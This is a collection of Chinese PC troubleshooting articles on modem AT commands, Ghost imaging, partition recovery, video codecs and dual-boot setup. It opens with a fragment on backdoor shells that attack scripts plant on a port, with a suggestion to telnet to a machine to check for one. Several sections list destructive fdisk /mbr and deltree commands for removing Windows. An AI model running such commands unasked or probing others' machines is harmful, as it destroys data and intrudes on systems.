说明：许多攻击脚本将安装一个后门SHELL于这个端口，尤其是针对SUN系统中Sendmail和RPC服务漏洞的脚本。如果刚安装了防火墙就看到在这个端口上的连接企图，很可能是上述原因。可以试试Telnet到用户的计算机上的这个端口，看看它是否会给你一个SHELL。连接到600/pcserver也存在这个问题。


什么是软件版本标志

《一键清理系统垃圾》

什么是软件版本标志

    在软件的“关于”窗口中，我们常会看见软件的版本号后有一些由英文和数字组成的后缀，这就是软件的版本标志。了解这些标志，可以使我们在下载时对软件的类型有个大致的了解。

    Trial：试用版，软件在功能或时间上有所限制，如果想解除限制，需要购买零售版。

    Retail：零售版。

    Free：免费版。

    Full：完全版。

    Alpha：内部测试版，通常在Beta版发布之前推出。

    Beta：测试版，正式版推出之前发布的版本。以上两种测试版本Bug可能较多。

    Final：正式版，软件的正式版本，修正了Alpha版和Beta版的Bug。

    SR：修正版或更新版，修正了正式版推出后发现的Bug。

    Pro：专业版，需要注册后才能解除限制，否则为评估版本。

    Plus：加强版。

    Delux：豪华版。Plus版和Delux版区别不大，比普通版本多了一些附加功能。

    Build：内部标号，同一版本可以有多个Build号，通常Build后面的数字越大，软件版本越新。某些软件后面的数字为发布时间，例如：Windows 优化大师 v5.4 Build 602。


VFAT (Virtual File Allocation Table)

《一键清理系统垃圾》

VFAT (Virtual File Allocation Table)

虚拟文件分配表
VFAT是Windows 95/98等以后操作系统的重要组成部分，它主要用于处理长文件名。长文件名不能为FAT文件系统处理。文件分配表是保存文件在硬盘上保存位置的一张表。原来的DOS操作系统要求文件名不能多于8个字符，因此限制了用户的使用。VFAT的功能类似于一个驱动程序，它运行于保护模式下，使用VCACHE进行缓存。


使用AT命令调试MODEM

《一键清理系统垃圾》

使用AT命令调试MODEM

最早生产调制解调器的公司是贺氏，后来组建的厂家制造的调制解调器都与HAYS兼容。大部分通信软件使用菜单来对调制解调器进行配置、检测，但有些通信软件要求用户直接发命令给调制解调器，在这种情况下必须使用AT命令。

AT命令集是调制解调器通信接口的工业标准，AT命令是调制解调器可以识别并执行的命令。AT命令简单、容易掌握，使用它可以配置调制解调器，配合通信软件工作，与远端系统通信，发起或应答一个呼叫。使用AT命令设置调制解调器时，用户使用的通信软件必须提供一个到调制解调器的直接连接状态，使你能够从命令行输入所需的AT命令，如在WINDOWS95下的“超级终端”中建立一个直接到串口的连接便可使用AT命令，也可使用ONLAN/PC软件的终端方式。

AT命令的基本格式为：AT+命令字符及相关设置参数，例如：ATDT0，2043506
这个命令表示使用音频拨号方式拨外线电话2043506。AT是前导符，D是命令字符，表示拨号，T这个参数表示用音频拨号。先拨“0”，紧随其后的逗号表示延迟处理下一个字符，称为拨号修正符。（可以通过设置S8寄存器的值定义延迟的时间，默认为2秒。范围为0-65秒）。

应用一：在将调制解调器与电话连在一起时，当有电话拨入时对方会听到调制解调器的应答风暴声，这的确很讨厌。通过下面的AT命令可以去掉调制解调器的自动应答功能。
ATS0=0（进行设置）
AT&W（保存设置）
这个命令用来设置寄存器S0的值，调制解调器的出厂值为1，允许自动应答；值为0，则禁止自动应答。

应用二：测试调制解调器。我们拿到一个调制解调器，在安装它之前，总想测试一下它的好坏。目前我们没有好的办法，一般是安装它的驱动程序，然后按照下列顺序单击开始→设置→控制面板，双击调制解调器，单击诊断→详细信息，计算机开始测试调制解调器，最后给出调制解调器的状况报告。这与正式安装一个调制解调器一样复杂。其实通过使用AT命令就可以对调制解调器进行测试。
使用超级终端，输入ATDT电话号码，即可听到调制解调器的拨号声，如果能够拨通，那么调制解调器就没问题，否则可能有问题。或者阅读调制解调器自带的说明手册，一般可以找到一个包含自检测命令的命令表。通常自测命令标识为&Tn(n表示数字)。关于它们工作的详细解释会包含在手册中。第一个命令为&T1，从超级终端的命令行键入：
at&f2（恢复出厂设置）
at&t1
我们应该能够看到类似下面的信息：CONNECT 33600/ARQ/V34/LAPM/V42BIS，接着可以键入一连串字符，在键入它们时，终端屏幕上应该同时出现。如果我们键入的字符和屏幕显示的字符一致，那么通过测试，调制解调器没有问题。然后键入“+++”，按下回车键断开连接。如果测试失败，那么调制解调器的硬件确实有问题。所有这些&Tn命令是AT命令集的标准部分，我们可以敲入它并执行。
下面列举一下一般的测试命令及其功能：
&t0结束测试
&t1初始化模拟回环测试
&t2备用
&t3初始化本地数字回环测试
&t4启动远程数字回环测试
&t5禁止远程数字回环测试
&t6初始化远程数字回环测试
&t7初始化带自测试的远程数字回环测试
&t8初始化带自测试的远程模拟回环测试
应用之三：设置自动拨号。在使用远程终端与服务器连接时，每次都需要拨相同的电话号码，建立通信链路与服务器连通，那么能不能把调制解调器设成一加电或一进入远程终端应用程序即开始拨号呢，答案是肯定的。使用如下命令即可实现此功能。
AT&F2
ATS13=24(当S13=8时，一有DTR信号，即开始拨存放在Z0中的电话号码；当S13=16时，当一加电或复位时,即开始自动拨存放在Z0中的电话号码；如S13的值为24，则两个功能都有。)
AT&Z0=P3506（设置要自动拨的电话号码，将其存放在Z0中）
AT&W（保存设置）

以上列举了AT命令的三个小应用，其实只要你仔细研究它，你会发现许多有趣的知识，它能够帮你从硬件底层了解调制解调器，使你运用调制解调器更得心应手。


使用GHOST时的几个常见问题

《一键清理系统垃圾》

使用GHOST时的几个常见问题

问：我在用Ghost重做系统时，提示以下错误：（29007）write sector failure　result＝1　drive＝128　sector7661 808 to 766109。这是什么原因？

    答：这是“写错误”的提示，需要进行磁盘扫描。

    问：我的电脑使用的是SATA（串行）硬盘，但Ghost在DOS下无法启动。请问如何解决？

    答：Ghost从7.7版开始就有Win 32的版本了，如果想做SATA硬盘的镜像，挂上一个安装有Windows 2000以上系统的硬盘（IDE或SATA的硬盘都可以）。安装SATA的驱动，利用Ghost32.exe就可以在Windows下对另一块SATA硬盘做镜像。

    问：请问有没有方法能在DOS下禁用Ghost？

    答：修改Command.com，把“Pause”改成“Ghost”，这样Ghost就成了原来的内部命令“Pause”。当输入Ghost的时候会提示“Press any key to continue”，然后退出。当然了，这样做并不是万无一失的，如果他人用启动盘启动照样能使用Ghost，另外直接输“Ghost.exe”也可运行。

    问：我将自己的C盘做了Ghost备份，希望能尽可能的小些以便于保存，做完后发现．gho文件有724MB，比较大，所以删除了一个C盘中大约有200MB的文件，期望重新镜像后能够把．gho文件减小，结果Ghost后大小竟然还是724MB，请问是什么原因？

    答：你删除的文件可能是Windows的交换文件，是给虚拟内存使用的，本来Ghost就不保存这文件的内容，所以删除与未删除的大小是一样的。

    问：我有3个分区C、D、E，对系统C盘作了Ghost，并把．gho文件放在了D分区，可以对D分区进行碎片整理吗？

    答：最好将备份文件放在一个不常用的分区，甚至单独划分一个，因为进行碎片整理有时会破坏备份文件。

    问：我对自己的Windows XP系统进行了Ghost备份，生成的文件有1．2GB那么大，为了刻录方便，如何分成两个．gho文件，恢复时第一个光盘恢复完就提示插入第二个光盘（要求是：我的硬盘有三个区，只把C盘克隆到D盘上，分两个．gho文件存，每个680MB）。

    答：ghost -clone,dump=pdump,src=1:1 dst=d:\\winxp.gho -split=680

    ghost -clone,mode=pdump,src=1:1 dst=d:\winxp.gho -split=680

    恢复的时候会提示插入第二张盘的

    问：我今天下载了Ghost自动恢复光盘制作文件，但有个问题，ghostcd．ima文件对应不同的操作系统环境是否需要修改？

    答：刻录的时候注意，第一张光盘根目录必须有ghost.exe和win2k.gho两个文件。如果你的镜像文件不是win2k.gho，必须修改ghostcd.ima里面的autoexec.bat的对应项。

    问：我有个SATA 80GB的硬盘，分成了三个区，C盘8GB、D盘60GB，余下的为E盘。我把C盘Ghost到E盘下面，此后Ghost的文件刻到光盘上面，最后我换了一个新硬盘，容量也是80GB，分区一样，可不可以把Ghost的文件向新硬盘上面的C盘恢复呢？恢复时新旧硬盘的C盘必须容量一样大吗？会不会出现其他问题？

    答：分区大于或小于原来的分区都没有问题，只要你源盘的文件能够在目标盘放得下就可以。但也要注意有些兼容性问题，可能会导致克隆后恢复失败。这多是因为装机的时候不法商贩图方便，直接在自己原有的机器上的硬盘或是光盘上找个克隆文件，Ghost数据到新机里，因为硬盘的型号、容量不同以及系统各项设置差异所致。


使用PartitionMagic中途断电后的数据恢复方法

《一键清理系统垃圾》

使用PartitionMagic中途断电后的数据恢复方法

    使用PQMagic的过程中突然断电，导致重要数据丢失。这种情况往往会让你不知所措，其实解决这一问题的方法还是很多的，下面以笔者的亲身经历来介绍一种解决方法。

    本人的30GB硬盘分了C～H六个区，其中F盘有10GB，专门用来装虚拟光驱文件，G盘4GB用来备份软件。出于某种原因，我想将F盘和G盘的数据对换一下，初步打算是用PQMagic将G盘删除，把留出的空闲区给F盘，然后将F盘数据往后移，再将F盘前部的空闲区作为新区，用来备份软件。

    在使用PQMagic之前，我先将G盘的软件放到D盘。然后用DOS版PQMagic 7.0删除G盘，接着进行硬盘空间转移，由于原来F盘有10GB，加上G盘的4GB多，共14.221GB，在这漫长的空间转移过程中，突然停电。来电后，进入PQMagic，发现系统中只有C～F四个区，那14.221GB的空间变成了黄颜色（无法识别）。

    鼠标右击黄颜色区域，选中“Info”，从区分信息中可看出物理块从25，736，193扇区到 54，861，974扇区共14，221.6MB即14.2GB的空间丢失（如图1）。

图1 14.2GB的硬盘空间丢失

    接着我使用了多种方法试图恢复数据，均无效果。最后“解铃还需系铃人”，是Windows版PQMagic 7.0救了我。操作步骤如下：

    1. 启动PQMagic后，选中系统不能识别的黄颜色的区域，点击鼠标右键，在弹出的菜单中选择“删除”，这时会弹出一个对话框，要求用户选择删除类型（如图2）。

图2 选择删除类型

    2. 选择上面一项即“删除”千万不要选第二项，否则数据就没法恢复了， 很快黄颜色区域变成了灰色，这是PQMagic中表示闲置硬盘空间的颜色。

    3. 右键单击灰色区域，在弹出的菜单中选择“恢复”，这时PQMagic会搜索硬盘上丢失的分区，并将搜索结果显示在对话框中。很快，PQMagic找回了两个丢失的分区。接下来在显示结果对话框中选中找到的F盘和G盘，点击“OK”进行恢复。随后灰色区域变成了正常的分区颜色，且分成了两个部分，PQMagic为它们分配了盘符，跟断电前一模一样。

    4. 在PQMagic主窗口中，点“确定”，使所有操作生效。重启后系统能发现两个分区，里面的数据跟断电前完全一样，达到100％数据恢复率。

    最后提醒大家一句，恢复数据是一件较危险的工作，如果你进行了“删除”、“恢复”等操作之后，在PQMagic中查看硬盘分区状况时没有恢复到预期的效果，请在PQMagic主窗口中选择“撤消操作”，这样PQMagic不会破坏你的分区，你才有机会用其他方法恢复。


视频播放的新问题全面解析

《一键清理系统垃圾》

视频播放的新问题全面解析

宽带的普及使在线点播视频成为可能，宽带的普及也让曾经备受网友们喜爱的RMVB视频逐渐被DVDRip视频所取代。DVDRip视频以其和DVD相差无几的清晰程度，受到很多影迷的欢迎。不过，由于这种格式需要编码支持，各种编码在不同的工作环境下表现不一，此外还需要字幕外挂工具等的协同工作，因此播放DVDRip格式的影片有时会出现一些奇怪的问题。在本文中，笔者就和大家来谈谈视频播放的新问题及其解决方法。

正确选择编码插件和播放软件

现在的AVI除了最老的Windows就支持的格式外，还有用Divx和Xvid编码及直接用MPEG4压缩成的AVI格式视频。一般来说，高版本Windows媒体播放器已经自动支持MPEG4格式，而且在连线状态下它会自动下载Divx和Xvid的编码。不过Windows媒体播放器8.0以下的版本没有亮度调节功能，很多AVI文件播放时无法选择播放进度，或是选择播放进度后只有声音无图像；9.0版本对AVI格式兼容性要求过高，编码稍微错误的AVI文件就无法播放。

以笔者的经验，用Divx5.1+Xvid+AC3解码（这些插件都可在Shooter.com.cn找到）是最佳组合。建议不要装FFSHOW这类号称一专多能的插件，有时会遇到播放时只有声音，图像变成一大块青色或粉红色块的问题。此外，各种插件编码之间会互相影响——如果你安装了某些编码播放AVI文件时遇到问题，卸载后再安装Divx5.1+Xvid+ AC3，也未必能恢复正常，你可能需要重新安装操作系统。

至于播放软件，由于至今也没一个兼容所有文件格式的软件，因此建议的组合是Windows媒体播放器+第三方播放软件（如金山影霸2003、WinDVD等）。Windows媒体播放器用来播放ASF、WMV等格式的文件，第三方播放软件用来播放RM等其他格式的文件。

正确处理字幕问题

1． 挑选中文字幕

绝大多数DVDRip视频都采用外挂字幕的形式，字幕文件有SRT、SSA、SUB三种格式。SUB是未经OCR识别的字幕，本质还是一串图形，需要IDX文件的支持；SRT和SSA 则是文字格式的字幕，只需要单独一个文件即可使用，文件一般仅有几十KB，便于传播。外挂的字幕文件往往不是纯中文的，有时有英文和中文甚至日文、法文等多种选择，默认情况下一般播放英文字幕。如果你依赖播放软件本身的挑选字幕功能，可能会出现无法正确选择中文字幕的现象。因此，我们应该安装VobSub这个专门的字幕文件工具。

VobSub除了能在播放时自动打开字幕文件外，还具备选择字幕类型的功能。安装VobSub后，播放DVDRip格式的AVI文件时，我们会在任务栏的系统托盘区看见绿色的小图标，用鼠标双击这个小图标打开如图所示的对话框，在“Main”选项卡下的“language”下面，我们可以选择字幕语言。一般简体中文字幕会带有Chinese、cn、gb等字样，而big5、traditional Chinese等则是繁体中文字幕。需要注意的是，字幕文件名称必须和视频文件名称一致，否则播放视频文件时VobSub不会自动播放字幕文件。

2． 解决字幕不同步的问题

由于DVDRip可能是由不同组织用不同的DVD版本做出来的，因此可能会出现字幕不同步的情况。在VobSub中，我们可以切换到“Timing”选项卡，调整第一个对话框中的数值，数值越大，字幕出现的速度就越快，反之则越慢。自己慢慢揣摩适当的比例吧。当然，如果字幕和对白相差太远，建议大家去下载适合当前DVDRip版本的字幕文件。

提示：字幕改了Timing后，应该重新启动播放软件。如果只是暂时停止了播放，可能会发生程序响应极慢或者是死机的现象。

视频播放常见问题分析

不是所有视频文件安装好编码插件后就能一帆风顺地观看下去，有些视频文件源文件亮度就不够，或是用户的显示器使用时间太长，亮度已经下降很多，在这些情况下需要手工调节播放的亮度。

1． 亮度调节、截图等问题

如果你用的是Windows媒体播放器8.0以上版本，可以在播放视频文件时单击“查看→正在播放工具→视频设置”，然后拖动相应的滑块调整画面亮度及色彩等选项（如图）。如果是使用《金山影霸2003》，在播放的时候把鼠标指针移动到屏幕最顶端，就会出现亮度、对比度及色彩的调节选项。当然，你也可以用PowerStrip等专业工具来调节显示的亮度和对比度。

视频文件的截图相对来说比较容易，但由于视频画面是通过DirextX输出的，因此用键盘上的Print Screen功能键无法截取视频画面，我们需要用版本较高的第三方抓图工具，如HyperSnap 4、SnagIt 6等等。

2． 画面倒转了怎么办

有些特殊编码的文件在播放时可能会出现画面倒转的问题（如图2），也有可能是由于该文件没有字幕文件造成的：我们可以把其他文件的字幕复制到这个目录，然后把名称改成相同的，再按上面的操作将字幕出现的速度调快一些，一般就可正常播放了。我们也可以使用播放软件本身支持的画面倒转功能来解决问题：假如我们用的是《金山影霸2003》，可以在播放画面上单击鼠标右键，选择“图像翻转播放”。如果你用的是Windows媒体播放器，且已经开启了VobSub，可以用鼠标右键单击任务栏上系统托盘区的绿色箭头，选择“Flipped Picture”命令即可。

3． 轻松播放RMVB格式文件

我们可以将RMVB格式文件的后缀直接改为RM，当作RM格式来播放。如果更改文件后缀名后无法正确播放，可以下载Real One Player的RMVB升级补丁。《金山影霸2003》也有一个专门的RMVB升级包，安装后就可以直接播放RMVB文件了。

最后要提醒大家的是，最新的软件和编码不一定效果最好，有时会遇上兼容性问题。比如DirectX 9就和部分电视卡有冲突。大家最好根据自己的软、硬件环境来选择配套的播放工具及编码支持，对于必须要Windows Media Player 9才能播放的影片，笔者的建议是安装多操作系统，各自安装不同的播放软件。


视频故障处理解答四例

《一键清理系统垃圾》

视频故障处理解答四例

优化DVDRip播放

问：我和别人的计算机配置一样，为什么别人可以正常播放DVDRip，而我这里的画面会停顿呢？
答：如果在播放DVDRip过程中遇到画面回放缓慢、画面停顿、或者是在播放一段时间后声音画面不同步的情况，主要原因是计算机运算速度跟不上要求，但也存在设置不当造成画面停顿的情况。此时可以使用Windows Media Player打开DVDRip影像文件后，依次运行“文件→属性”命令，在“高级”标签中可以查看到当前DVDRip使用到的所有插件，在列表中双击相应的解码插件进入属性控制面板。将“CPU（Quality）”一项的滑块条拖拽至最左边，降低CPU的占有率之后能够解决画面停顿的故障。

影片字幕为何无法显示

问：为什么我的DVDRip影片没有字幕显示呢？
答：出现这种问题的原因比较多，主要有以下几种可能性。

1. 字幕文件名是否与AVI文件的主文件名相同，比如AVI文件名为test.avi，则字幕文件的前缀必须为“test”，否则VobSub无法识别出字幕文件，自然也就无法显示字幕了。

2. 字幕文件与AVI文件是否放置在同一个文件夹中，如果放置在不同文件夹内也无法显示字幕。另外，建议大家不要将字幕文件放置在中文文件夹中，这样也会导致字幕文件无法显示。

3. 系统中是否安装有DirectX 8或者更高的版本，如果没有安装也会导致VobSub加载字幕文件失败。

4. 是否安装了最新版本的VobSub，因为有些低版本不支持Windows Media Player 6.4以上版本，这样许多高版本软件制作的字幕就无法在低版中播放。

5. 检查是否字幕超出画面边界造成不能显示字幕，此时可以用Vobsub设置窗口中的“Override Placement”按钮来调整字幕的显示位置。

播放时为何只有画面

问：为什么播放DVDRip的时候只有画面，但是听不到声音或者无法输出5．1声道？
答：出现这个问题的原因也很多，大家可以按照下述几方面进行查看。

1. 是否已经安装DirectX 8或更高的版本，同时检查是否安装了AC3 Filter，如果这两者没有正确安装的话，那么DVDRip是不会发声的。

2. 有些朋友在自己的机器中同时安装了AC3 Filter和TFM(AC3)Audio Filter，不过这两者并不能和平共处，建议只保留AC3 Filter。

如何实现双字幕显示

问：我想在显示中文字幕的同时显示英文字幕，这应该如何实现呢？
答：如果想实现双字幕，需要借助DivXG400的帮助，在安装好DivXG400之后要在属性设置窗口中的“Picture”标签下将“Load filter”一项调整为“Force”，这样它就可以和VobSub同时工作了。在播放DVDRip的时候，接着再分别进入VobSub和DivXG400属性页面，各自选择不同的语言，我们就可以在一部DVDRip中观看中英文两种字幕了。如果出现两个字幕重叠的情况，只要在DivXG400属性页的“Subtitle”标签中增加“Vertical”的数值即可。

作者：一江之水


在注册表中

《一键清理系统垃圾》

在注册表中

[HKEY_CURRENT_USER\keyboard layout\preload]
位置下就是输入法的顺序
调整后重新启动就OK

或者删除所有输入法，再重新安装
先安装的就在前面

我的电脑是英文和智能ABC顺序注册表为

REGEDIT4

[HKEY_CURRENT_USER\keyboard layout\preload]

[HKEY_CURRENT_USER\keyboard layout\preload\1]
@="00000409"

[HKEY_CURRENT_USER\keyboard layout\preload\2]
@="E0040804"


数据破坏后的正常恢复

《一键清理系统垃圾》

数据破坏后的正常恢复

    当硬盘数据被破坏后，如果你按本刊上期“备份数据专题”中介绍的winzip、Ghost等软件将数据备份到另外的盘或分区上，那么恢复起来很简单，按软件提示操作即可，在此不赘述。如果你将数据copy了一份保存在别的目录或分区，那恢复起来更简单，再copy回来就可以了。在DOS用得最多的是Xcopy，它的功能很强大，使用这个命令，可以拷贝一个目录中的所有文件，包括该目录中的子目录的所有文件（DOS7.0以后的Xcopy甚至可以拷贝隐藏文件）。其语法为：

    XCOPYsource[destination][/Y][/-Y][/A|/M][/D:date][/P][/S[/E]][/V][/W][/H]。

    比如要将d:\bf下所有文件恢复至C:\gs可以使用如下命令：

    xcopyd:\bf\*.*/s/hc:\gs

    又比如，要恢复d:\bf下，2000年1月1日后的文件至c:\gs，可使用如下命令：

    xcopyd:\bf\*.*/s/h/d:2000-01-01c:\gs

    DOS下另外一个常用的恢复软件就是RESTORE。可以恢复用MS-DOS2.0至5.0的BACKUP命令备份的文件。可以从不同类型的磁盘恢复文件。其语法为：

    RESTOREdrive1:drive2:[path[filename]][/S][/P][/B:date][/A:date][/E:time][/L:time][/M][/N][/D]

    下面列出一个使用RESTORE恢复文件的例子：

    例如要将A驱动器备份盘中的INVEST.MNT文件恢复到C盘的IRS目录，可使用以下命令：restorea:c:\irs\invest.mnt

    MS-DOS会提示在A驱动器中插入备份盘；插好盘后，按回车键继续执行。

    如果备份了C盘\USER\ADAMS目录中的所有文件，要恢复这些文件时，在驱动器A中

    插入备份盘并键入以下命令：restorea:c:\user\adams\*.*

    指定文件名*.*是很重要的，否则RESTORE命令会试图恢复USER目录中的ADAMS文件。

    要从A驱动器的备份盘(可以是多个备份盘)恢复出整个硬盘，可键入以下命令：restorea:c:\*.*/s

    /S开关和通配符(*.*)指定RESTORE将所有备份文件恢复到C盘上原来的目录和子目录中。


双系统安装方法

《一键清理系统垃圾》

双系统安装方法

在Windows XP基础上安装Windows 98
    在Windows 98环境下安装Windows XP系统时，一般不会出现任何问题。但是如果先装了Windows XP（比如有些品牌电脑在出厂前就预装了Windows XP Professional），后来由于某种原因（如不习惯Windows XP环境，某些设备驱动程序不支持Windows XP等），想再装一个Windows 98，但是系统会因为检查到高版本Windows系统的存在而拒绝安装！怎么办？format掉重装？Windows XP中上的软件、文件数据可不能丢呀！看，这时故障就出来了。

    直接在Windows XP环境下安装Windows 98是行不通的，但是“条条大路通罗马”，此路不通我们可以绕道而行。不过绕道也得绕对道才行，不然也会行不通，那怎么才算绕对道路呢？就是必须将所有的磁盘驱动器文件格式转化成FAT32格式，否则安装Windows 98会出现多处报错（注意：不单单是Windows 98的目标盘，所有的盘都要转化为FAT32文件格式）。原因是：Windows 98和DOS都不支持NTFS格式，安装时不允许NTFS分区的存在。笔者就曾经在这里栽过跟斗，请广大读者注意。

    准备好后，现在便拿出Windows 98的启动盘，启动到DOS下，从DOS下安装Windows 98到另外的分区，安装方法很简单。

    多系统引导菜单丢失

    这个问题算是最常见的了，笔者使用的初期，仅仅在一个月内就分别由三种不同的原因造成了Windows XP无法启动。

    有一天，笔者的Windows 98系统出了点小毛病，“聪明”的我不管三七二十一，拿出Windows 98启动盘启动到DOS下，迅速键入“SYS C:”一回车，Windows 98好是好了，可是重新启动的时候却直接进入了Windows 98 ，Windows XP“消失”得“无影无踪”了。

    实际上可不是Windows XP消失了，只是丢失了多系统引导菜单而已，你完全可以使用“恢复控制台”来解决，但是还可以用另外一种方法，请看笔者是如何找回来的：

    用Windows XP的安装光盘引导，在DOS下运行Windows XP的安装程序，“假装”要重新安装系统，等到第一次拷贝文件结束后，按照系统的提示，把光盘拿出来，重新启动计算机，此时你就会看到熟悉的多系统引导菜单了，不用接着往下安装，只需编辑Windows XP的boot.ini文件，删除无关的选项（即删除掉最后那行长长的字符串）就可以了。最后还要做一些善后的工作：将刚才“假”安装时拷贝的临时文件删除掉。做完了上面这些，你重新启动机器看看，“久违”的多系统引导菜单又回到了你的怀抱。

    Windows XP无法启动

    只有真正使用过Windows XP才会知道，稍有不慎的操作都会造成Windows XP的无法启动。那么到底有哪些不慎的操作会引起Windows XP的无法启动呢？笔者配合实际经历，总结出以下三点现象及防范建议：

    1、在装有Windows 98和Windows XP的机器上重新安装Windows 98，将会导致Windows XP无法启动（注意：这和在Windows XP基础上安装Windows 98不一样，这是在原有Windows 98的基础上覆盖安装）。这实际上是将位于系统启动分区根目录下的Windows XP启动文件覆盖了，造成Windows XP不能启动。解决的方法请参照“多系统菜单丢失”的解决办法，关键是编辑boot.ini文件。

    如果你找不到boot.ini文件，可以用以下的方法：先进入C盘，单击菜单栏中的“工具”菜单，选择“文件夹选项”，在“文件夹选项”窗口中选择“查看”标签页，再将“隐藏受保护的操作系统文件（推荐）”前的勾去掉。

    这时会弹出一个警告对话框，不必理它，选“确定”就行。同时还要在“隐藏文件和文件夹”下选中“显示所有文件和文件夹”，选择“确认”后你会发现在该目录下出现了许多系统文件和隐藏文件，boot.ini启动文件也在其中。

    2、在Windows 98与Windows XP双系统环境下，将Windows 98升级为Windows 2000，导致Windows XP无法启动。出现此种类型的故障是因为升级的Windows 2000改写了ntldr、ntdetect.com、boot.ini这三个重要的启动文件，Windows 2000无法引导Windows XP，造成Windows XP无法启动。

    解决方法：启动进入Windows 98，将Windows XP的安装光盘放入CD-ROM，从i386目录中将ntldr、ntdetect.com这两个文件拷贝到系统启动分区根目录下，并将其设置为只读、隐藏属性。这样就可以启动Windows XP系统了。

    3、更新Windows XP中的某一个驱动程序导致Windows XP无法启动。这种情况也经常可以遇到，这是新的驱动程序不兼容造成的。所以不要追赶时髦，请用稳定、可靠的驱动程序更新当前的设备。你可以进入Windows XP的安全模式修复，方法是启动Windows XP，在出现启动进度条时按住F8键，调出Windows XP的启动菜单，从中选择安全模式。进入后，请使用Windows XP的系统还原将系统恢复到以前的正常状态。

    卸载NTFS分区上的Windows XP

    如果是安装单独的Windows XP系统，为了安全起见，一般都推荐将Windows XP所在的分区格式化成NTFS格式。虽然我们推荐在多系统的情况下，保留FAT32分区格式，但如果你还是选择了转换分区到NTFS格式的话，当某一天想卸载Windows XP的时候，你会发现很麻烦。这时，你不妨试试以下的方法：

    启动计算机，进入Windows 98，把Windows XP安装光盘放入CD-ROM ，运行Windows XP的安装程序，选择修复安装，接着在安装的过程中选择把系统分区转换为FAT32格式，然后重新启动计算机，再次进入Windows 98，将Windows XP所在的分区（D盘）格式化掉。最后，请用Windows 98的启动盘引导计算机，在DOS下执行“SYS C:”命令，这样，Windows XP才能真正从你的计算机上消失干净。

    程序无法在Windows XP下运行

    Windows XP比Windows 2000的兼容性好，但也有某些程序只能在Windows 98下运行，而在Windows XP下无法运行，这时候怎么办呢？退出系统进入Windows 98下运行？没有这个必要，我们可以利用Windows XP提供的“兼容模式”功能来运行，让其在模拟的Windows 98模式下运行该程序，方法如下：右键单击程序的图标，选择“属性”，打开属性对话框，选择“兼容性”标签，在“兼容模式”栏内选择合适的系统，最后点击“确定”。


双系统的安全卸载

《一键清理系统垃圾》

双系统的安全卸载

1、Win2000与Win9x/WinMe
由于Win2000所采用的内核和以前Win9x/WinMe的都不同，所以无法采用升级操作，但是Win2000提供了良好的双系统并存的功能。想单独删除某一系统而保存另一系统，就不那么简单了，以下将分别介绍。

1.多系统中Win2000的删除
准备一张Win98的启动盘，然后执行以下的命令。

fdisk/mbr 重写硬盘主引导区。

sys C: 传送Win98的系统文件。

deltree C:＼WINNT 删除Win2000的系统文件存放目录。

deltree C:＼boot*.* 删除以boot开头的所有文件，这里有多系统启动菜单的文件。

deltree C:＼nt*.*删除以nt开头的所有文件。

deltree C:＼hiberfil.sys 删除系统设置存盘文件。

deltree C:＼pagefile.sys 删除页面文件。

完成上面的操作后即可删除Win2000。

2.多系统中Win9x的删除
首先必须确认你默认启动的是Win2000而是不是Win9x，如果是Win9x需要修改其启动顺序。在Win2000下点击“我的电脑”，打开右键菜单中的“属性”，在“系统特性”中选择“高级”，点击“启动和故障恢复”按钮，在接下来的窗口中就可以修改启动顺序，同时还可以修改启动时间。你可以将启动时间改为0，这样在启动时就不会出现启动菜单选项，而是直接启动Win2000。

然后删除Win9x的系统目录，包括Windows和Program Files目录。如果你是将Win9x和Win2000放在同一个分区，那么只要删除Windows目录，因为在这种情况下Program Files目录在Win2000和Win9x中是公用的。然后删除Win9x引导文件，包括io.sys、msdos.sys、command.com、autoexec.bat和config.sys。

完成以上的操作后，你就恢复了Win2000的单系统。此方法对于WinMe和Win2000的双系统同样试用。

对于单系统和升级系统下Windows的卸载比较简单，而相对来说在多系统下某个系统中的删除复杂一些。所以对于多系统下卸载系统，最好对重要文件进行备份，在错误操作后以提供恢复时使用。

2、XP与ME
    问：我的电脑安装的是Windows Me和Windows XP双系统，我现在想卸载D盘的Windows XP系统，应如何卸载？是格式化D盘吗？

    答：简单的格式化D盘并不能彻底地卸载Windows XP。要彻底细卸载Windows XP，可以直接删除D盘上的Windows(你安装Windows XP的目录)、Program Files和Documents and Settings文件夹(请确保D盘是FAT32格式，否则Windows Me无法访问，必须转换为FAT32格式)，然后到C盘中删除如下文件：ntldr、ntdetect.com、boot.ini、ntbootdd.sys(如果你有SCSI设备的话)和bootfont.bin，最后用Windows Me启动光盘引导计算机，执行命令：a:\sys c:即可彻底卸载Windows XP。


双系统问题集合

《一键清理系统垃圾》

双系统问题集合

    一、修复Windows 98/XP双系统启动菜单
    1.修复前，在BIOS中设置从光驱启动。用Windows XP安装盘启动电脑，在加载必要的驱动后，出现Windows XP的安装界面。有三个选项：
    (1)要现在开始安装Windows XP，请按“Enter”键。
    (2)要用“恢复控制台”修复Windows XP安装，按“R”键。
    (3)要退出安装程序，不安装Windows XP，按“F3”键；

     2. 按“R”键，进入“Microsoft Windows XP (TM) 故障恢复控制台”界面；故障恢复控制台提供系统修复和故障恢复功能。系统这时会搜寻已安装的Windows XP系统文件，然后显示搜寻结果，并询问“要登录到哪个Windows XP安装（要取消，请按Enter）”，选择1. D:Windows，回车，系统会再询问“管理员密码”，再键入安装Windows XP时设置的管理员密码，回车，出现D:Windows〉，这时需要输入修复命令Fixboot，后面的参数为启动扇区要写入的磁盘盘符，这里填入C:，回车。修复完成，键入Exit退出。重启后就会看到久违的双重启动菜单了。并且，这样修复后基本不产生垃圾文件。

    二、巧修WindowsXP 双启动菜单
     在Windows98下全新安装WindowsXP，会自动生成双启动菜单，相当方便。WindowsXP是极其稳定的操作系统，但因为双启动菜单的文件一般都在C盘根目录下，很易受损。虽然你可以备份与双启动有关的文件，还可以使用Ghost把C盘整个备份下来，或制作紧急修复软盘以便受损时恢复，但如果使用者粗心大意没做备份，又没有紧急修复软盘那怎么办？难道要重装WindowsXP？还有几十个大小软件？！其实我们还有最后一招：恢复控制台。
    开始时和重装一样，要选择全新安装，等安装文件复制好，电脑重新启动，选择进入恢复控制台，控制台会提示你要登录到哪个WindowsXP安装，一般就选默认的“1”，键入系统管理员密码，你就进入了控制台的Windows目录下，键入“BOOTCFG／ADD”，控制台会扫描Windows安装，几秒钟后扫描完成，提示选择要添加的安装，选“1”，接着提示输入加载识别符，可输入“MicrosoftWindowsXPProfessional”，提示输入OS加载选项，键入fastdetect，回车，键入“EXIT”，重新启动电脑，你可以看到熟悉的双启动菜单又回来了。进入系统后，把所有分区内带“＄”的文件及文件夹全删掉。

    三、恢复WinMe\XP双系统引导菜单
